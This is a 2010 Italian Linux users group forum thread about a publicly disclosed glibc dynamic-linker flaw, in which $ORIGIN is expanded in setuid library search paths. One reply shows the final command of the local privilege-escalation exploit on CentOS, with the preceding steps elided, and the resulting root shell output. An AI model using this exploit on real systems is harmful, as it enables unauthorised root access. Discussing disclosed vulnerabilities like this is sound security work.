Indice del forum Emilia Romagna Linux Users Group
i forum di ERLUG
torna alla home page di ERLUG
 
 Forum SubscriptionsForum Subscriptions   FAQFAQ   CercaCerca   Lista utentiLista utenti   GruppiGruppi   RegistratiRegistrati 
 ProfiloProfilo   Messaggi privatiMessaggi privati   Log inLog in 

Questa e` proprio bella

 
Nuovo argomento   Rispondi    Indice del forum -> ERLUG
Precedente :: Successivo  
Autore Messaggio
Guido Bolognesi [Zen]
Ospite





MessaggioInviato: Mer 20 Ott 2010 08:36    Oggetto: Questa e` proprio bella Rispondi citando

Di due giorni fa, ma mi pare comunque interessante:
http://seclists.org/fulldisclosure/2010/Oct/257

The GNU C library dynamic linker expands $ORIGIN in setuid library search path

Provato su ubuntu con 2.7-10ubuntu6 e su una Debian con libc
2.7-18lenny4 e non va.
Su RH e Fedora mi dicono che funzioni, Tavis sostiene anche su CentOS.

have fun,
_________________
guido . zen@xxxxxx.xyz . skype://zenmobile
Top
Davide Brini
Ospite





MessaggioInviato: Mer 20 Ott 2010 10:48    Oggetto: Questa e` proprio bella Rispondi citando

On Wednesday 20 Oct 2010 09:33:51 Guido Bolognesi [Zen] wrote:
Citazione:
Di due giorni fa, ma mi pare comunque interessante:
http://seclists.org/fulldisclosure/2010/Oct/257

The GNU C library dynamic linker expands $ORIGIN in setuid library search
path

Provato su ubuntu con 2.7-10ubuntu6 e su una Debian con libc
2.7-18lenny4 e non va.
Su RH e Fedora mi dicono che funzioni, Tavis sostiene anche su CentOS.

Questo e' su un CentOS aggiornato:

...
[foo@frobozz ~]$ LD_AUDIT="\$ORIGIN" exec /proc/self/fd/3
[root@frobozz ~]# whoami
root
[root@frobozz ~]# id
uid=0(root) gidP0(foo) groupsP0(foo) context=user_u:system_r:unconfined_t
Top
Mostra prima i messaggi di:   
Nuovo argomento   Rispondi    Indice del forum -> ERLUG Tutti i fusi orari sono GMT + 1 ora
Pagina 1 di 1

 
Vai a:  
Non puoi inserire nuovi argomenti
Non puoi rispondere a nessun argomento
Non puoi modificare i tuoi messaggi
Non puoi cancellare i tuoi messaggi
Non puoi votare nei sondaggi


Powered by phpBB © 2001, 2005 phpBB Group
phpbb.it

torna alla home page di ERLUG
Per informazioni o problemi, contattare info@erlug.linux.it.
La connettività per questo sito e per gli altri nostri servizi è offerta da Ehiweb.it